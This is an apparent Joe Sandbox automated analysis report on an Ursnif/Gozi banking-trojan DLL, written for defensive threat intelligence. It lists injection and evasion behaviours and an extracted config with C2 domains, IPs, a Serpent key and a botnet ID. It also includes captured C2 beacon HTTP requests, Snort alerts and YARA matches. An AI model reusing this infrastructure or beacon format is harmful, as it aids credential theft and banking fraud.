Windows Analysis Report
7078612.dll

Overview

General Information

Sample Name: 7078612.dll
Analysis ID: 752294
MD5: cba263871219062d981111b00cc131fc
SHA1: 50e2c7caf7dd0f826bc6e814bd62fbb39982ceed
SHA256: 65f687a5c0e757cd8e296f8b0453b27726e5017502e93dcb8379d59fe9c056a3
Tags: dll, Ursnif

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Sigma detected: Dot net compiler compiles file from suspicious location
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Snort IDS alert for network traffic
Maps a DLL or memory area into another process
Writes to foreign memory regions
Self deletion via cmd or bat file
Changes memory attributes in foreign processes to executable or writable
Machine Learning detection for sample
Allocates memory in foreign processes
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Injects code into the Windows Explorer (explorer.exe)
Modifies the context of a thread in another process (thread injection)
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Writes registry values via WMI
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Searches for the Microsoft Outlook file path
Drops PE files
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Checks if the current process is being debugged
Compiles C# or VB.Net code
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection

Source: http://internetcoca.in/jerry/T6bm4Th9ln_2Fe/GCStuiGucXHPyvDK2HFa_/2Fnq4Pg9Qcwk7hcp/3kKDARDgW7_2BxB/l Avira URL Cloud: Label: malware
Source: http://internetcoca.in/ Avira URL Cloud: Label: malware
Source: http://internetcoca.in/a Avira URL Cloud: Label: malware
Source: http://internetcoca.in/jerry/T6bm4Th9ln_2Fe/GCStuiGucXHPyvDK2HFa_/2Fnq4Pg9Qcwk7hcp/3kKDARDgW7_2BxB/lHo21jXWhX39Xk5R4R/_2F_2FyAz/YZ8oYHuNhYCmHdf0wSbR/salWQlnNDBjP7A66JVO/sppCnKDjVH3lbE5G7LF5U7/5LSg_2BcZCu_2/F5_2FR_2/B6AH2Mv27ibqMLrY4km_2Fx/gY8_2FL6Mv/5k_2BKapoEIZ8reVa/lFw7CKKCr00_/2FffYJ4qZ35/6uQ8_2B3xnzdTZ/FQ3TIcDZlZ_2BmcKyHZ4r/5C6qwwmwbcuALm_2/BEPFExtOhb_2B6k/D_2FhWFqp3TtB_2BN/1vytrT.bob Avira URL Cloud: Label: malware
Source: internetcoca.in Virustotal: Detection: 20%
Source: 7078612.dll Joe Sandbox ML: detected
Source: 00000003.00000002.684277856.0000000000D90000.00000040.10000000.00040000.00000000.sdmp Malware Configuration Extractor: Ursnif {"RSA Public Key": "bdyFPOOFadPIE+3Dpt3w3yYYobtlUfGHmkNXXhEHJZrgq+pMKFl/sc2wfLGDAcGr6aqONRURpCfnbKsvcUbIGVS0tUVr4USeghefWwgL9ZQvVt+Wms+/fsaQ4VA9haNvCrTsNgywFQRd86atcQ5HZEvnzynAU+sWx3vgEy3de6xYedEo9QwkMZmOY1efWAGBuAhNzJ+zgYb92lBu1HFwMVWas966cpiEbynar9CpsNFqdLF1t7yizeW2KS+obTRWgYChp39Cmdcy6zxrZh+Fibssh3hcSOGQo3AqO9V622C23Z3ve8vsR2k0wPicse7/Fu+H0+OaWRh90FFOWVCYiIyOZEuvmKiznuluuDx1iWA=", "c2_domain": ["internetwork.top", "interspin.top", "groupconnect.info", "onlinegroup.pw", "onlinesgroup.top", "directoronliner.ru", "directoronliner.su", "premiumdocs.ru", "premiumdocs.info", "dendexmm.com", "fortrexmll.com", "31.207.46.12", "31.207.46.126"], "ip_check_url": ["http://ipinfo.io/ip", "http://curlmyip.net"], "serpent_key": "0gV5XR1ZycScNvAe", "tor32_dll": "file://c:\\test\\test32.dll", "tor64_dll": "file://c:\\test\\tor64.dll", "server": "50", "sleep_time": "1", "SetWaitableTimer_value(CRC_CONFIGTIMEOUT)": "60", "time_value": "60", "SetWaitableTimer_value(CRC_TASKTIMEOUT)": "60", "SetWaitableTimer_value(CRC_SENDTIMEOUT)": "300", "SetWaitableTimer_value(CRC_KNOCKERTIMEOUT)": "60", "not_use(CRC_BCTIMEOUT)": "10", "botnet": "5050", "SetWaitableTimer_value": "1"}
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_050D52F6 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError, 3_2_050D52F6
Source: 7078612.dll Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
Source: Binary string: ntdll.pdb source: rundll32.exe, 00000003.00000003.633082420.0000000006580000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.626656927.0000000006580000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ntdll.pdbUGP source: rundll32.exe, 00000003.00000003.633082420.0000000006580000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.626656927.0000000006580000.00000004.00001000.00020000.00000000.sdmp

Networking

Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 31.41.44.51 80
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 31.207.46.124 80
Source: C:\Windows\SysWOW64\rundll32.exe Domain query: internetcoca.in
Source: C:\Windows\SysWOW64\rundll32.exe Domain query: meganetwork.top
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 172.105.103.207 80
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 62.173.149.9 80
Source: C:\Windows\SysWOW64\rundll32.exe Domain query: supernetwork.top
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.7:49711 -> 13.107.42.16:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.7:49711 -> 13.107.42.16:80
Source: Traffic Snort IDS: 2023883 ET DNS Query to a *.top domain - Likely Hostile 192.168.2.7:50505 -> 8.8.8.8:53
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.7:49712 -> 31.41.44.51:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.7:49718 -> 172.105.103.207:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.7:49718 -> 172.105.103.207:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.7:49722 -> 31.207.46.124:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.7:49722 -> 31.207.46.124:80
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: Joe Sandbox View ASN Name: ASRELINKRU
Source: Joe Sandbox View ASN Name: HOSTKEY-ASNL
Source: Joe Sandbox View IP Address: 172.105.103.207
Source: global traffic HTTP traffic detected: GET /jerry/hMt_2FkMsACDp/Ggtycrpr/3jyWUhPR8uVsI6k_2Bbu1hb/kdbdt_2BOm/9tP_2BQtD9vLJNuMH/RpW6bg0QRvZX/QXfPDGL10GT/SdaapIAklDbfEO/Uj_2BAmamwU2u8BHod3aP/PgD0dTDTJEMSc0UK/j1e9AdZnRhxmLd2/iyZSWXfqsPP5Mz2_2F/RxfeMhVZi/snsYr1rBTn9DbB3n1htJ/THaNUdrjEpMaPV5FZB0/hnSI3F95hi8RSrq2PqAvJg/NhyoyNMSlw300/RuRhnMAi/yuKjfRG8BZDb0ZtEsV/Y0c.bob HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Host: meganetwork.top Connection: Keep-Alive Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /jerry/c5L4i7gs7U/TPlgCZUjVlFX76S6w/ptrxQO4jUOhI/F6ePNzRyuKF/MbNtzcp0Ju65aR/ZLc8q9AvlDxusKBXZEkxW/7UMIMirPk3DmAiEd/MIUggpPiQ7ixyfB/FE8tNplPzMQkKS2ZFu/JXFIU12Aw/jv5mVYFsQ20lg4INnqbs/F8R3I0LYx88osTnvgV0/etG2XQldFgo6x4JgYsuQNF/j4JQ96Ft17Rz7/eCxN97dQ/rJhcjYfddaM8eJW_2Fean2z/A92cM0Ky22/lOBKLw85du6YHY_2B/3g2GAbm.bob HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Host: supernetwork.top Connection: Keep-Alive Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /jerry/T6bm4Th9ln_2Fe/GCStuiGucXHPyvDK2HFa_/2Fnq4Pg9Qcwk7hcp/3kKDARDgW7_2BxB/lHo21jXWhX39Xk5R4R/_2F_2FyAz/YZ8oYHuNhYCmHdf0wSbR/salWQlnNDBjP7A66JVO/sppCnKDjVH3lbE5G7LF5U7/5LSg_2BcZCu_2/F5_2FR_2/B6AH2Mv27ibqMLrY4km_2Fx/gY8_2FL6Mv/5k_2BKapoEIZ8reVa/lFw7CKKCr00_/2FffYJ4qZ35/6uQ8_2B3xnzdTZ/FQ3TIcDZlZ_2BmcKyHZ4r/5C6qwwmwbcuALm_2/BEPFExtOhb_2B6k/D_2FhWFqp3TtB_2BN/1vytrT.bob HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Host: internetcoca.in Connection: Keep-Alive Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /jerry/jTzxAnqL2OvVUr_2F/fauV7gAxn9qx/8pFCJL9tnDU/iLzaMJ4HX1GykO/HoC2Mc7MKhdMVEZs5LHn1/1_2BHT6MZAolHFOS/6QcVb6Sy1jmNhbf/GYszPrGfJFenuaRQz6/_2BhFQScX/2I2_2FVeVKW5cCoy7gT4/8KYwuw3rx60555o08Kn/opCh843XnHy29nfuXF6b2z/huTk_2FUjzUDI/ISxuKPlx/DZKqk4ugdLqCYc3dzjZ_2Br/21q0mwi2jT/PIT_2FnEyJ3MqtVh6/qexCz0xFpyCT/BYpr5_2B38q/mb5tW8uXYlLBsL/HRJTV7U9DpT/Lb.bob HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Host: 31.207.46.124 Connection: Keep-Alive Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /jerry/3nn_2BNEVXd0Rxht2AWGTxC/GW4p8XGNLb/FjhKQ84fH_2BkNicF/oP5tQPlnMrJr/VzmSaztxByX/Gj2CVVFo49mQFm/C9zaruRo3JRcHrjSr91x3/QFYBC_2FsxN_2B7X/uufaTAjpOm99699/Pq_2FSETrsZSqN9Ojz/3qeuXW2xr/R0a72t7BsPAzZ_2BbGig/RJ4QPZizbCIE_2Fbc3V/bnU9fiqNJ0ptmBxGj2iZqV/2_2BtpYpuaB39/FW0ST0qr/ePsn6GFPOwexxSy3EgaplHS/uHjfw_2BI_/2BU_2B8F8OF00pKIM/YJkKjo7czRDc/E_2BThKsX/cG_2Fr.bob HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Host: 31.207.46.124 Connection: Keep-Alive Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /jerry/5BN0ICz4uWiAkFly3NWE/wdb3AqkjVSwyFUhuqrz/lHc_2B4wxe4nLA1HUOqfnP/QlJbnXjOv_2Ft/Q5KyRgYr/iv5NSA792h1xHcDS5L6fsEG/6f6Mo_2Fxe/zRCCWBAwTeLJqLbV9/kqNgWULptALz/6SvcsPi5EHX/ePWs4WCPyL8a8x/7zSS0_2F0FPHafzsv8Nrj/_2FvbJqIrbuIliTu/28Zs8gl0EBncgLE/E0Xb7wwqBhrlCP2lDF/LuKqKVbSw/I0P0F2TMmM1CY00Wt6n5/Qvz8fbopIWFtWKI6Q1E/CrYECeKd/SC2ahZciZ/j0v83.bob HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Host: 31.207.46.124 Connection: Keep-Alive Cache-Control: no-cache
Source: unknown TCP traffic detected without corresponding DNS query: 31.207.46.124
Source: rundll32.exe, 00000003.00000002.684712502.000000000103A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.685619999.0000000001099000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.207.46.124/jerry/3nn_2BNEVXd0Rxht2AWGTxC/GW4p8XGNLb/FjhKQ84fH_2BkNicF/oP5tQPlnMrJr/VzmSazt
Source: rundll32.exe, 00000003.00000002.684712502.000000000103A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.685619999.0000000001099000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.207.46.124/jerry/5BN0ICz4uWiAkFly3NWE/wdb3AqkjVSwyFUhuqrz/lHc_2B4wxe4nLA1HUOqfnP/QlJbnXjOv
Source: rundll32.exe, 00000003.00000002.684712502.000000000103A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.207.46.124/jerry/jTzxAnqL2OvVUr_2F/fauV7gAxn9qx/8pFCJL9tnDU/iLzaMJ4HX1GykO/HoC2Mc7MKhdMVEZ
Source: rundll32.exe, 00000003.00000002.684712502.000000000103A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://config.edge.skype.com/jerry/aSMHh5W2R09y97_/2BTh3L56RxwrH5JH4F/CB8VvX3np/o6NOLngWb2K_2FSc_2BM
Source: rundll32.exe, 00000003.00000003.641058618.0000000006568000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.625082208.0000000006568000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000003.623671400.000002EFC474C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000003.638851811.000001F81DE7C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000002.881229478.000001F81DE7C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000003.638947869.000001F81DE7C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://constitution.org/usdeclar.txt
Source: rundll32.exe, 00000003.00000003.641058618.0000000006568000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.625082208.0000000006568000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000003.623671400.000002EFC474C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000003.638851811.000001F81DE7C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000002.881229478.000001F81DE7C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000003.638947869.000001F81DE7C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: powershell.exe, 00000011.00000002.882964274.000002EFAB757000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: rundll32.exe, 00000003.00000003.641058618.0000000006568000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.625082208.0000000006568000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000003.623671400.000002EFC474C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000003.638851811.000001F81DE7C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000002.881229478.000001F81DE7C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000003.638947869.000001F81DE7C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: rundll32.exe, 00000003.00000003.398431744.0000000001099000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.685619999.0000000001099000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://internetcoca.in/
Source: rundll32.exe, 00000003.00000003.398431744.0000000001099000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.685619999.0000000001099000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://internetcoca.in/a
Source: rundll32.exe, 00000003.00000003.398431744.0000000001099000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.398416154.0000000001086000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.685619999.0000000001099000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://internetcoca.in/jerry/T6bm4Th9ln_2Fe/GCStuiGucXHPyvDK2HFa_/2Fnq4Pg9Qcwk7hcp/3kKDARDgW7_2BxB/l
Source: rundll32.exe, 00000003.00000003.352302871.0000000001099000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.398431744.0000000001099000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://meganetwork.top/
Source: rundll32.exe, 00000003.00000002.684712502.000000000103A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://meganetwork.top/jerry/hMt_2FkMsACDp/Ggtycrpr/3jyWUhPR8uVsI6k_2Bbu1hb/kdbdt_2BOm/9tP_2BQtD9vLJ
Source: powershell.exe, 00000011.00000002.884674469.000002EFAB931000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: rundll32.exe, 00000003.00000003.352302871.0000000001099000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.398431744.0000000001099000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.685619999.0000000001099000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://supernetwork.top/
Source: rundll32.exe, 00000003.00000003.352302871.0000000001099000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.398431744.0000000001099000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://supernetwork.top/%
Source: rundll32.exe, 00000003.00000003.352302871.0000000001099000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.398431744.0000000001099000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.685619999.0000000001099000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://supernetwork.top/E
Source: rundll32.exe, 00000003.00000002.684712502.000000000103A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://supernetwork.top/jerry/c5L4i7gs7U/TPlgCZUjVlFX76S6w/ptrxQO4jUOhI/F6ePNzRyuKF/MbNtzcp0Ju65aR/Z
Source: unknown DNS traffic detected: queries for: meganetwork.top
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_050D466D ResetEvent,ResetEvent,InternetReadFile,GetLastError,ResetEvent,InternetReadFile,GetLastError, 3_2_050D466D

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: Yara match File source: 00000003.00000003.265395446.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000003.638851811.000001F81DE7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.265195135.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.264965724.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.265067401.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.881229478.000001F81DE7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000003.638947869.000001F81DE7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.265347278.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.570768221.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.572202912.00000000055DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000003.623671400.000002EFC474C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.641058618.0000000006568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.265156974.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.625082208.0000000006568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.571562648.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.265372293.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.265017955.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 5108, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 5872, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: control.exe PID: 5160, type: MEMORYSTR

E-Banking Fraud

Source: Yara match File source: 00000003.00000003.265395446.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000003.638851811.000001F81DE7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.265195135.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.264965724.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.265067401.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.881229478.000001F81DE7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000003.638947869.000001F81DE7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.265347278.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.570768221.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.572202912.00000000055DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000003.623671400.000002EFC474C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.641058618.0000000006568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.265156974.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.625082208.0000000006568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.571562648.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.265372293.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.265017955.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 5108, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 5872, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: control.exe PID: 5160, type: MEMORYSTR
Source: C:\Windows\explorer.exe Registry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_050D52F6 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError, 3_2_050D52F6

System Summary

Source: 00000003.00000003.683465563.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000003.00000003.683465563.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000003.00000003.265395446.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000003.00000003.265395446.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000018.00000003.638851811.000001F81DE7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000003.00000003.265195135.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000003.00000003.265195135.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000003.00000003.264965724.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000003.00000003.264965724.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000003.00000003.265067401.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000003.00000003.265067401.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000018.00000002.881229478.000001F81DE7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000018.00000003.638947869.000001F81DE7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000003.00000003.265347278.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000003.00000003.265347278.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000003.00000003.570768221.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000003.00000003.570768221.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000003.00000003.683592364.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000003.00000003.683592364.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000011.00000003.623671400.000002EFC474C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000003.00000002.688834794.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000003.00000002.688834794.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000003.00000003.683319477.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000003.00000003.683319477.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000003.00000003.641058618.0000000006568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000003.00000003.265156974.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000003.00000003.265156974.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000003.00000003.625082208.0000000006568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000003.00000003.571562648.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
